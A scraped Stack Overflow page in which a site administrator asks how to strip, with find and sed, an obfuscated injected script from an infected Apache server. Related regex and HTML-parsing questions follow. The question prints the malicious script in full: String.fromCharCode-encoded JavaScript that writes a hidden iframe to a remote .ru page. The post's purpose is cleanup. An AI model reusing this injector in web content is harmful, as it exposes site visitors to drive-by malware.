sed multiline replace HTML with javascript malicious code - regex

I've a apache server that has been infected with pieces of malicious javascript code to infect the computers that visit the web page.
What i'm trying to do is remove these pieces of malicious code using find and sed commands in a Linux server.
I have created a regular expression for sed that match almost everything but the "" end tag. It is in a new line and I can't find the way to match it as well.
The malicious code is:
<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }
</script>
Note of the writer: After creating the question, I can see that the web formatting cuts the previous sample. If you want to see the full sample of malicious javascript code, have a look at the text not bold in the next text and just add at the end of the text a "new line" and a "" html tag.
The regular expression that works for all the text but for the last "</script>" is:
**find /root/cambios -type f -exec sed -i 's#**<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }**##g' {} \;**
So, please, anyone can help to match the new line and the "" text??
Thank you in advance.

Indeed you shouldn't use regex for this task. As has been told many times in SO regex are not the proper tool for dealing with HTML manipulations as it is not a regular language. Your best bet is to use an HTML parser. For instance, the following unoptimized (but still simple) code uses Jsoup for achieving your goal:
import org.jsoup.Jsoup;
import org.jsoup.nodes.DataNode;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.nodes.Node;
import org.jsoup.select.Elements;
public class RemoveScript {
public static void main(String args[]){
String viralContent = "Your viral content";
String inputText = "<html><head><script>" + viralContent + "</script></head><body></body></html>";
Document doc = Jsoup.parse(inputText);
Elements scripts = doc.select("script");
for(Element element : scripts) {
for (Node child: element.childNodes()) {
if (child instanceof DataNode) {
String content = ((DataNode) child).getWholeData();
if (content.equals(viralContent)) {
element.remove();
}
}
}
}
System.out.println(doc.toString());
}
}
I'm sure other parsers can do the same very easily too.

Related

regex.exec not able to extract table from email body

I have email body where there is a table which has "Client Time" as the heading of first left Column.
I want to extract this whole table but am getting Null with following exec.
let regex = /<tr><td><b>Client Time([\S\s]+)<table/;
Logger.log(regex.exec(tempbody));
Here is the extra code but that should be fine.
if ((table = regex.exec(tempbody)) !== null) {
row_regex = new RegExp(/<tr>(.+)<\/tr>/g);
let data, tempdata, rows, cell;
Logger.log(data);
while ((rows = row_regex.exec(table[1])) !== null) {
data = []
cell_regex = new RegExp(/<td.*?>(.+?)<\/td>/g);
while ((cell = cell_regex.exec(rows[1])) !== null) {
data.push(cell[1]);
}
if (!tempdata || (tempdata && tempdata.length === data.length)) {
sheet.appendRow(data);
}
tempdata = data;
}
inProcessLabel.removeFromThread(threads[i]);
}
What change do I need to do in regex, sorry I don't understand regular expressions much but believe that this same code worked for me in past.
Using regular expressions to parse HTML is not a good idea (for a number of reasons).
We have V8 now so you can simply add a proper HTML/XML parser library (written in pure Javascript with minimal dependencies) to your Apps Script project. Just get the library source in full or minified form and add it as its own script file.
Here are a few good options:
XPath (source: full | minified)
HTMLParser2-20KB (source: minified)

Google App Script findText regex not working for new line character

I'm trying to locate/modify text in my Google Document where the text has been broken across a full line break. My regular expression below works when I manually find text in the Google document (CTRL+F) and then search via the regular expression dialog. What is baffling is why the exact same regex doesn't work in the code below on full line breaks, i.e. "\n" (note: the soft line "\v" breaks are ok).
The second approach finds the text but I'm unable to do anything with it as I need the element object in-order to manipulate the text.
//Test document 1Q6v8ipqA81LoPtpk71NdqTaIEqMjki1KIJbrm0bILBg contains the following text:
//
//This Agreement shall not be assigned by either party without the prior\n
//written consent of the parties hereto
var doc = DocumentApp.openById('1Q6v8ipqA81LoPtpk71NdqTaIEqMjki1KIJbrm0bILBg');
//Method 1 - does NOT locate the text
var body = doc.getBody();
var pattern = "prior[\s]*written";
var foundElement = body.findText(pattern);
while (foundElement != null) {
var foundText = foundElement.getElement().asText();
var start = foundElement.getStartOffset();
var end = foundElement.getEndOffsetInclusive();
foundElement = body.findText(pattern, foundElement);
}
//Method 2 - locates the text, but I cannot acquire the element object
var body2 = doc.getBody().getText();
var pattern2 = /prior[\s]*written/;
while (m=pattern2.exec(body2))
{
Logger.log(m[0]);
}
}
If this were ever going to work, you would need the regex to be in s (single line) mode. Per https://developers.google.com/apps-script/reference/document/body#findtextsearchpattern,
A subset of the JavaScript regular expression features are not fully supported, such as capture groups and mode modifiers.
So it looks like they have in fact chosen not to support multi-line matches in any way.

Regex to replace domain within links that are not images

Need to replace a domain name on all the links on the page that are not images or pdf files.
This would be a full html page received through a proxy service.
Example:
test<img src="http://www.test.com" /><a href="http://www.test.com/test.pdf">pdf
test1
Result:
test<img src="http://www.test.com" /><a href="http://www.test.com/test.pdf">pdf
test1
If you are using .NET, I strongly suggest you to use HTML Agility Pack
Direct parsing using regex can be very error prone. This questions is also similar to the post below.
What regex should I use to remove links from HTML code in C#?
If the domain is http://www.example.com, the following should do the trick:
/http:\/\/www\.example\.com\S*(?!pdf|jpg|png|gif)\s/
This uses a negative lookahead to ensure that the regex matches a string only if the string does not contain pdf,png,jpg or gif at the specified position.
If none of your pdf urls have query parameters (like a.pdf?asd=12), the following code will work. It replaces only absolute and root-relative urls.
var links = document.getElementsByTagName("a");
var len = links.length;
var newDomain = "http://mydomain.com";
/**
* Match absolute urls (starting with http)
* and root relative urls (starting with a `/`)
* Does not match relative urls like "subfolder/anotherpage.html"
* */
var regex = new RegExp("^(?:https?://[^/]+)?(/.*)$", "i");
//uncomment next line if you want to replace only absolute urls
//regex = new RegExp("^https?://[^/]+(/.*)$", "i");
for(var i = 0; i < len; i++)
{
var link = links.item(i);
var href = link.getAttribute("href");
if(!href) //in case of named anchors
continue;
if(href.match(/\.pdf$/i)) //if pdf
continue;
href = href.replace(regex, newDomain + "$1");
link.setAttribute("href", href);
}

How do I linkify text using ActionScript 3

I have a text that I want to linkify (identify URLs and convert them to HTML links). The text could be multi-line, and could contain multiple urls like the example below.
My current actionscript code looks like this
<mx:Script>
<![CDATA[
import mx.controls.Alert;
import mx.rpc.events.FaultEvent;
import mx.rpc.events.ResultEvent;
private function init():void {
var str:String = "#stack the website for google is http://www.google.com and gmail is http://gmail.com";
//Alert.show(linkify(str),"Error");
txtStatus.htmlText = linkify(str);
}
private function linkify(texty:String):String {
//return texty.replace("/[A-Za-z]+:\/\/[A-Za-z0-9-_]+\.[A-Za-z0-9-_:%&\?\/.=]+/g",function(m):String { return m.linkify(m);});
//return texty.replace(/[A-Za-z]+:\/\/[A-Za-z0-9-_]+\.[A-Za-z0-9-_:%&\?\/.=]+/g, function(m):String {return m.linkify(m);}).replace(/(^|[^\w])(#[\d\w\-]+)/g, function(m2):String{return '#' + m2.substr(1) + ''; });
var pattern:RegExp = /[A-Za-z]+:\/\/[A-Za-z0-9-_]+\.[A-Za-z0-9-_:%&\?\/.=]+/g;
var match:String = pattern.exec(texty);
return texty.replace(pattern,'<a href="' + match + '">' +
match + '</a>');
}
]]>
</mx:Script>
The problem with the above script is that it recognizes the first match and uses that across. Also how do i do it for #?
Any help is highly appreciated.
ooph ... why does everybody use regex these days, to accomplish super simple tasks? also, you forgot, that "+" is a valid character for URLs, as a replacement for space, and even an awful lot of other characters may be used, so your pattern would not even match accordingly ...
well, anyway, have a look at AS3 regex metacharacters ...
that'll GREATLY improve your expression's readability and is much more robust...
i'd go with something like this, really:
var r:RegExp = /(?:http|https):\/\/\S*/g;
trace(str.replace(r, function (s:String,...rest):String {
return '' + s + ''
} ));
but the actual point, was the global flag ...
good luck then ... :)
greetz
back2dos

How do I extract HTML img sources with a regular expression?

I need to extract the src element from all image tags in an HTML document.
So, the input is an HTML page and the output would be a list of URL's pointing to images:
ex... http://www.google.com/intl/en_ALL/images/logo.gif
The following is what I came up with so far:
<img\s+src=""(http://.*?)
This does not work for tags where the src isn't directly after the img tag, for example:
<img height="1px" src="spacer.gif">
Can someone help complete this regular expression? It's pretty easy, but I thought this may be a faster way to get an answer.
The following regexp snippet should work.
<img[^>]+src="([^">]+)"
It looks for text that starts with <img, followed by one or more characters that are not >, then src=". It then grabs everything between that point and the next " or >.
But if at all possible, use a real HTML parser. It's more solid, and will handle edge cases much better.
You don't want to do that. Correctly parsing HTML is a very complex problem, and regular expressions are not a good tool for that.
See e.g.
Can you provide some examples of why it is hard to parse XML and HTML with a regex?
And here for a good solution:
How do I programatically inspect a HTML document
You could do this pretty easily with Javascript. An example would be like below:
var images = document.getElementsByTagName("img");
for (i=0; i < images.length; i++)
{
// get image src
var currImage = images[i].src;
// do link creation here
}
This works great for me
$regexp = '<img[^>]+src=(?:\"|\')\K(.[^">]+?)(?=\"|\')';
if(preg_match_all("/$regexp/", $content, $matches, PREG_SET_ORDER)) {
if( !empty($matches) ) {
for ($i=0; $i <= count($matches); $i++)
{
$img_src = $matches[$i][0];
echo $img_src;
}
}
}